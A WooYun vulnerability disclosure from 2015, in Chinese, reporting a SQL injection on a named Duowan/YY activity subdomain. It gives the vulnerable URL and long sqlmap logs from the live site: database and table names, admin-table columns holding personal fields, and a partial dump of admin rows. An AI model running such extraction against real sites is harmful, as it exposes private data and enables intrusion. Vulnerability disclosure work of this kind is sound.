漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0162007
漏洞标题:多玩某重要分站GET型注入漏洞
相关厂商:广州多玩
漏洞作者: 路人甲
提交时间:2015-12-17 09:23
修复时间:2015-12-22 09:24
公开时间:2015-12-22 09:24
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某分站注入
详细说明:
URL:http://hdzx.g.yy.com/activitysys/detail?act=peiwan
[17:22:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.11
[INFO] fetching database names
[INFO] the SQL query used returns 3 entries
[INFO] retrieved: "information_schema"
[INFO] retrieved: "auditdb"
[INFO] retrieved: "hd"
available databases [3]:
[*] auditdb
[*] hd
[*] information_schema
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.11
[17:36:21] [INFO] fetching current database
[17:36:22] [WARNING] reflective value(s) found and filtering out
current database: 'hd'
试试跑下hd这个数据库:
[08:23:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.11
[08:23:10] [INFO] fetching tables for database: 'hd'
[08:23:11] [INFO] the SQL query used returns 170 entries
[08:23:11] [INFO] retrieved: "100_admin"
[08:23:11] [INFO] retrieved: "100_courses"
[08:23:11] [INFO] retrieved: "100_lesson"
[08:23:12] [INFO] retrieved: "100_operator"
[08:23:12] [INFO] retrieved: "100_regist"
[08:23:12] [INFO] retrieved: "100_sell"
[08:23:12] [INFO] retrieved: "100_student"
[08:23:13] [INFO] retrieved: "100_study_his"
[08:23:13] [INFO] retrieved: "100_teacher"
[08:23:13] [INFO] retrieved: "Award"
[08:23:13] [INFO] retrieved: "AwardPool"
[08:23:14] [INFO] retrieved: "AwardPool_game"
[08:23:41] [INFO] retrieved: "AwardPool_tanabata"
[08:23:43] [INFO] retrieved: "Award_game"
[08:23:43] [INFO] retrieved: "Award_tanabata"
[08:23:43] [INFO] retrieved: "ExchangePool"
[08:23:43] [INFO] retrieved: "act_module"
[08:23:44] [INFO] retrieved: "act_page"
[08:23:44] [INFO] retrieved: "act_user"
[08:23:44] [INFO] retrieved: "activity"
[08:23:44] [INFO] retrieved: "activity_metas"
[08:23:45] [INFO] retrieved: "award_qualification"
[08:23:45] [INFO] retrieved: "award_qualification_moon"
[08:23:45] [INFO] retrieved: "award_quote"
[08:23:45] [INFO] retrieved: "bao_xiang"
[08:23:46] [INFO] retrieved: "baoming"
[08:23:46] [INFO] retrieved: "baoming_yyuid"
[08:23:46] [INFO] retrieved: "bind"
[08:23:46] [INFO] retrieved: "book_notify_record"
[08:23:47] [INFO] retrieved: "book_notify_record_tanabata"
[08:23:47] [INFO] retrieved: "broadcast_award_info"
[08:23:47] [INFO] retrieved: "channel_blacklist"
[08:23:47] [INFO] retrieved: "channel_blacklist_in"
[08:23:48] [INFO] retrieved: "channel_state"
[08:23:48] [INFO] retrieved: "choujiang_times"
[08:23:48] [INFO] retrieved: "demon_game"
[08:23:48] [INFO] retrieved: "error_record"
[08:23:49] [INFO] retrieved: "error_record_"
[08:23:49] [INFO] retrieved: "error_record_moon"
[08:23:49] [INFO] retrieved: "event"
[08:23:49] [INFO] retrieved: "exchange"
[08:23:50] [INFO] retrieved: "exchange_pool"
[08:23:50] [INFO] retrieved: "exchange_qualification"
[08:23:50] [INFO] retrieved: "exchange_qualification_"
[08:23:50] [INFO] retrieved: "exchange_quote"
[08:23:51] [INFO] retrieved: "exchange_type"
[08:23:51] [INFO] retrieved: "game_team_fix"
[08:23:51] [INFO] retrieved: "game_team_fix_27"
[08:23:51] [INFO] retrieved: "gyy_index"
[08:23:52] [INFO] retrieved: "kickout_member_fix"
[08:23:52] [INFO] retrieved: "kickout_member_fix_27"
[08:23:52] [INFO] retrieved: "mon_refresh"
[08:23:52] [INFO] retrieved: "monster_record"
[08:23:53] [INFO] retrieved: "monsters"
[08:23:53] [INFO] retrieved: "my_activity"
[08:23:53] [INFO] retrieved: "notification"
[08:23:54] [INFO] retrieved: "notify_test"
[08:23:54] [INFO] retrieved: "order_list"
[08:23:54] [INFO] retrieved: "order_ret_list"
[08:23:54] [INFO] retrieved: "other_notify"
[08:23:55] [INFO] retrieved: "other_notify_tmp2"
[08:23:55] [INFO] retrieved: "ow_notify"
[08:23:55] [INFO] retrieved: "ow_notify_tanabata"
[08:23:55] [INFO] retrieved: "participant_blacklist"
[08:23:56] [INFO] retrieved: "participant_blacklist_in"
[08:23:56] [INFO] retrieved: "participant_earth_day"
[08:23:56] [INFO] retrieved: "phone_passport"
[08:23:56] [INFO] retrieved: "pos"
[08:23:57] [INFO] retrieved: "product_list"
[08:23:57] [INFO] retrieved: "product_order_list"
[08:23:57] [INFO] retrieved: "product_order_ret"
[08:23:58] [INFO] retrieved: "questions"
[08:23:58] [INFO] retrieved: "ranking_cake"
[08:23:58] [INFO] retrieved: "ranking_cake_tmp"
[08:23:59] [INFO] retrieved: "ranking_channel"
[08:23:59] [INFO] retrieved: "ranking_channel_tmp"
[08:23:59] [INFO] retrieved: "ranking_daily_score"
[08:23:59] [INFO] retrieved: "ranking_daily_score_chibi"
[08:24:00] [INFO] retrieved: "ranking_daily_score_datang"
[08:24:00] [INFO] retrieved: "ranking_daily_score_jianghu"
[08:24:00] [INFO] retrieved: "ranking_daily_score_lianzhan"
[08:24:00] [INFO] retrieved: "ranking_daily_score_lingyu"
[08:24:01] [INFO] retrieved: "ranking_daily_score_lingyu2"
[08:24:01] [INFO] retrieved: "ranking_daily_score_moxia"
[08:24:01] [INFO] retrieved: "ranking_daily_score_moxia_copy"
[08:24:01] [INFO] retrieved: "ranking_daily_score_moyu"
[08:24:02] [INFO] retrieved: "ranking_daily_score_msanguo"
[08:24:02] [INFO] retrieved: "ranking_daily_score_tianxia3"
[08:24:02] [INFO] retrieved: "ranking_daily_score_wendao2"
[08:24:03] [INFO] retrieved: "ranking_daily_score_wuhun"
[08:24:03] [INFO] retrieved: "ranking_daily_score_xiyou2"
[08:24:03] [INFO] retrieved: "ranking_daily_score_xiyou3"
[08:24:03] [INFO] retrieved: "ranking_daily_score_youhun"
[08:24:03] [INFO] retrieved: "ranking_daily_score_zhanshen"
[08:24:04] [INFO] retrieved: "ranking_daily_score_zhengtu2"
[08:24:04] [INFO] retrieved: "ranking_list_earth_day"
[08:24:04] [INFO] retrieved: "ranking_list_earth_day_20130427_backup"
[08:24:04] [INFO] retrieved: "ranking_win"
[08:24:05] [INFO] retrieved: "ranking_win_tmp"
[08:24:05] [INFO] retrieved: "reg_temp"
[08:24:05] [INFO] retrieved: "reg_temp2"
[08:24:05] [INFO] retrieved: "registration_yy_chibi"
[08:24:06] [INFO] retrieved: "registration_yy_datang"
[08:24:06] [INFO] retrieved: "registration_yy_jianghu"
[08:24:06] [INFO] retrieved: "registration_yy_lianzhan"
[08:24:07] [INFO] retrieved: "registration_yy_lingyu"
[08:24:07] [INFO] retrieved: "registration_yy_lingyu2"
[08:24:07] [INFO] retrieved: "registration_yy_moxia"
[08:24:08] [INFO] retrieved: "registration_yy_moxia_copy"
[08:24:08] [INFO] retrieved: "registration_yy_moyu"
[08:24:08] [INFO] retrieved: "registration_yy_moyu_copy1"
[08:24:08] [INFO] retrieved: "registration_yy_msanguo"
[08:24:09] [INFO] retrieved: "registration_yy_qingdian"
[08:24:09] [INFO] retrieved: "registration_yy_tianxia3"
[08:24:09] [INFO] retrieved: "registration_yy_tx2014"
[08:24:10] [INFO] retrieved: "registration_yy_tx2014_tmp"
[08:24:10] [INFO] retrieved: "registration_yy_wendao2"
[08:24:10] [INFO] retrieved: "registration_yy_wuhun"
[08:24:10] [INFO] retrieved: "registration_yy_xiyou2"
[08:24:11] [INFO] retrieved: "registration_yy_xiyou3"
[08:24:11] [INFO] retrieved: "registration_yy_zhanshen"
[08:24:11] [INFO] retrieved: "registration_yy_zhengtu2"
[08:24:12] [INFO] retrieved: "registration_yy_zhengtu2_copy"
[08:24:12] [INFO] retrieved: "score_earth_day"
[08:24:12] [INFO] retrieved: "score_tmp"
[08:24:12] [INFO] retrieved: "security_code"
[08:24:14] [INFO] retrieved: "security_code_push"
[08:24:15] [INFO] retrieved: "sys_msg_tasks"
[08:24:15] [INFO] retrieved: "t1"
[08:24:15] [INFO] retrieved: "t2"
[08:24:17] [INFO] retrieved: "t_campus_phone_message"
[08:24:17] [INFO] retrieved: "t_campus_phone_message2"
[08:24:17] [INFO] retrieved: "t_mid_autumn_ans"
[08:24:18] [INFO] retrieved: "t_mid_autumn_user_medal"
[08:24:18] [INFO] retrieved: "t_mid_autumn_user_medal2"
[08:24:18] [INFO] retrieved: "t_question_game_equipment"
[08:24:19] [INFO] retrieved: "t_question_game_name"
[08:24:19] [INFO] retrieved: "t_question_user_select"
[08:24:19] [INFO] retrieved: "t_question_user_suggestion"
[08:24:19] [INFO] retrieved: "team_member_fix"
[08:24:20] [INFO] retrieved: "team_member_fix_27"
[08:24:20] [INFO] retrieved: "temp_activity"
[08:24:20] [INFO] retrieved: "tmp_need_bind"
[08:24:20] [INFO] retrieved: "tmp_need_bind_2"
[08:24:21] [INFO] retrieved: "toefl_exam"
[08:24:21] [INFO] retrieved: "tx2014_act_info_t"
[08:24:21] [INFO] retrieved: "tx2014_drop_diamond_t"
[08:24:21] [INFO] retrieved: "tx2014_game_info_t"
[08:24:22] [INFO] retrieved: "tx2014_miner_info_t"
[08:24:22] [INFO] retrieved: "tx2014_mining_cfg_t"
[08:24:22] [INFO] retrieved: "tx2014_stone_cfg_t"
[08:24:22] [INFO] retrieved: "tx2014_stone_exchange_t"
[08:24:23] [INFO] retrieved: "user_blacklist"
[08:24:23] [INFO] retrieved: "user_blacklist_in"
[08:24:23] [INFO] retrieved: "user_notify"
[08:24:23] [INFO] retrieved: "user_notify_alibaba"
[08:24:24] [INFO] retrieved: "user_notify_tanabata"
[08:24:24] [INFO] retrieved: "user_reg_yy_teach_11"
[08:24:24] [INFO] retrieved: "vip_auth_code"
[08:24:24] [INFO] retrieved: "wg_user_record"
[08:24:25] [INFO] retrieved: "yy_admin"
[08:24:25] [INFO] retrieved: "yy_operator"
[08:24:25] [INFO] retrieved: "yy_question"
[08:24:25] [INFO] retrieved: "yy_question_reply"
[08:24:26] [INFO] retrieved: "yy_student"
[08:24:30] [INFO] retrieved: "yy_teacher"
[08:24:31] [INFO] retrieved: "yyno_login"
[08:24:31] [INFO] retrieved: "yypush_test"
[08:24:31] [INFO] retrieved: "yyuid_temp"
[08:24:31] [INFO] retrieved: "zijin_vote"
[08:24:31] [INFO] fetching columns for table '100_admin' in database 'hd'
[08:24:33] [INFO] the SQL query used returns 23 entries
[08:24:33] [INFO] retrieved: "yyuid","int(10)"
[08:24:33] [INFO] retrieved: "name","varchar(20)"
[08:24:34] [INFO] retrieved: "sex","varchar(5)"
[08:24:34] [INFO] retrieved: "birthday","date"
[08:24:34] [INFO] retrieved: "id_card","varchar(50)"
[08:24:39] [INFO] retrieved: "nationality","varchar(50)"
[08:24:40] [INFO] retrieved: "resident","varchar(50)"
[08:24:40] [INFO] retrieved: "phone1","varchar(50)"
[08:24:40] [INFO] retrieved: "phone2","varchar(50)"
[08:24:40] [INFO] retrieved: "e_mail","varchar(50)"
[08:24:41] [INFO] retrieved: "address","varchar(100)"
[08:24:41] [INFO] retrieved: "qq","varchar(20)"
[08:24:43] [INFO] retrieved: "weixin","varchar(50)"
[08:24:44] [INFO] retrieved: "tencent_weibo","varchar(50)"
[08:24:44] [INFO] retrieved: "sina_weibo","varchar(50)"
[08:24:44] [INFO] retrieved: "served_inc","varchar(50)"
[08:24:44] [INFO] retrieved: "good_at","varchar(50)"
[08:24:45] [INFO] retrieved: "intro","varchar(250)"
[08:24:45] [INFO] retrieved: "video_url","varchar(250)"
[08:24:45] [INFO] retrieved: "create_time","datetime"
[08:24:46] [INFO] retrieved: "last_update_time","datetime"
[08:24:46] [INFO] retrieved: "operator","int(10)"
[08:24:46] [INFO] retrieved: "admin_type","int(5)"
[08:24:46] [INFO] fetching entries for table '100_admin' in database 'hd'
[08:24:47] [INFO] the SQL query used returns 4 entries
[08:24:47] [INFO] retrieved: "","4","1980-01-01","2013-12-06 16:29:12","","",...
[08:24:47] [INFO] retrieved: "","4","1980-01-01","2013-12-13 09:57:49","","",...
[08:24:48] [INFO] retrieved: "6","4","0000-00-01","0000-00-00 00:00:00","5","...
[08:24:48] [INFO] retrieved: "","4","1980-01-01","2013-12-06 16:28:38","","",...
[08:24:48] [INFO] analyzing table dump for possible password hashes
Database: hd
Table: 100_admin
[4 entries]
+----------+---------+----------+-----------+---------+---------+----------+----
-----+---------+---------+---------+---------+---------+---------+----------+---
---------+------------+------------+------------+---------------------+---------
----+---------------+---------------------+
| yyuid | id_card | resident | video_url | qq | sex | name | int
ro | weixin | phone2 | phone1 | e_mail | good_at | address | operator | bi
rthday | sina_weibo | served_inc | admin_type | create_time | national
ity | tencent_weibo | last_update_time |
+----------+---------+----------+-----------+---------+---------+----------+----
-----+---------+---------+---------+---------+---------+---------+----------+---
---------+------------+------------+------------+---------------------+---------
----+---------------+---------------------+
[08:24:48] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
| ?? | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank>
| 50012755 | 1980-01-01 | <blank> | <blank> | 4 | 2013-12-06 16:
29:12 | ?? | <blank> | 2013-12-06 16:29:12 |
| 50001932 | <blank> | <blank> | <blank> | <blank> | <blank> | calen | <bl
ank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 50012755 | 19
80-01-01 | <blank> | <blank> | 4 | 2013-12-13 09:57:49 | ??
| <blank> | 2013-12-13 09:57:49 |
| 50012755 | aa | 2 | 17f | 7 | ? | ? | fff
ff | 9 | 4 | 3 | 5 | 3 | 6 | 0 | 00
00-00-01 | f | b | 4 | 0000-00-00 00:00:00 | 1
| 0 | 2013-12-06 16:27:45 |
| 50013440 | <blank> | <blank> | <blank> | <blank> | <blank> | DinDinHo | <bl
ank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 50012755 | 19
80-01-01 | <blank> | <blank> | 4 | 2013-12-06 16:28:38 | ??
| <blank> | 2013-12-06 16:28:38 |
+----------+---------+----------+-----------+---------+---------+----------+----
-----+---------+---------+---------+---------+---------+---------+----------+---
---------+------------+------------+------------+---------------------+---------
----+---------------+---------------------+
[08:24:48] [INFO] table 'hd.100_admin' dumped to CSV file 'C:\Python27\sqlmap\ou
tput\hdzx.g.yy.com\dump\hd\100_admin.csv'
[08:24:48] [INFO] fetching columns for table '100_courses' in database 'hd'
[08:24:48] [INFO] the SQL query used returns 14 entries
[08:24:49] [INFO] retrieved: "course_id","int(10) unsigned"
[08:24:49] [INFO] retrieved: "course_name","varchar(50)"
[08:24:49] [INFO] retrieved: "course_content","varchar(250)"
[08:24:49] [INFO] retrieved: "course_hour","varchar(100)"
[08:24:50] [INFO] retrieved: "create_time","datetime"
[08:24:50] [INFO] retrieved: "course_price","varchar(50)"
[08:24:50] [INFO] retrieved: "course_discount","varchar(10)"
[08:24:50] [INFO] retrieved: "course_picture_url","varchar(250)"
[08:24:51] [INFO] retrieved: "course_video_url","varchar(250)"
[08:24:51] [INFO] retrieved: "sell_begin","datetime"
[08:24:51] [INFO] retrieved: "sell_end","datetime"
[08:24:51] [INFO] retrieved: "teacher","varchar(50)"
[08:24:52] [INFO] retrieved: "operator","int(11)"
[08:24:52] [INFO] retrieved: "last_update_time","timestamp"
[08:24:55] [INFO] fetching entries for table '100_courses' in database 'hd'
Database: hd
Table: 100_courses
[0 entries]
+-----------+------------------+---------+----------+----------+------------+---
----------+-------------+-------------+--------------+----------------+---------
--------+------------------+--------------------+
| course_id | course_video_url | teacher | sell_end | operator | sell_begin | co
urse_name | create_time | course_hour | course_price | course_content | course_d
iscount | last_update_time | course_picture_url |
+-----------+------------------+---------+----------+----------+------------+---
----------+-------------+-------------+--------------+----------------+---------
--------+------------------+--------------------+
+-----------+------------------+---------+----------+----------+------------+---
----------+-------------+-------------+--------------+----------------+---------
--------+------------------+--------------------+
[08:24:55] [INFO] table 'hd.100_courses' dumped to CSV file 'C:\Python27\sqlmap\
output\hdzx.g.yy.com\dump\hd\100_courses.csv'
[08:24:55] [INFO] fetching columns for table '100_lesson' in database 'hd'
[08:24:56] [INFO] the SQL query used returns 10 entries
[08:25:26] [INFO] retrieved: "course_id","int(11)"
[08:25:26] [INFO] retrieved: "lesson_id","int(11)"
[08:25:26] [INFO] retrieved: "lesson_name","varchar(50)"
[08:25:27] [INFO] retrieved: "lesson_content","varchar(250)"
[08:25:27] [INFO] retrieved: "lesson_time","datetime"
[08:25:27] [INFO] retrieved: "channel_id","int(11)"
[08:25:36] [INFO] retrieved: "teacher_id","int(11)"
[08:25:36] [INFO] retrieved: "create_time","datetime"
[08:25:36] [INFO] retrieved: "operator","int(11)"
...
很多,涉及一些敏感的数据,不继续了!
求送礼物!谢谢!(*^__^*)
漏洞证明:
RT
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-12-22 09:24
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无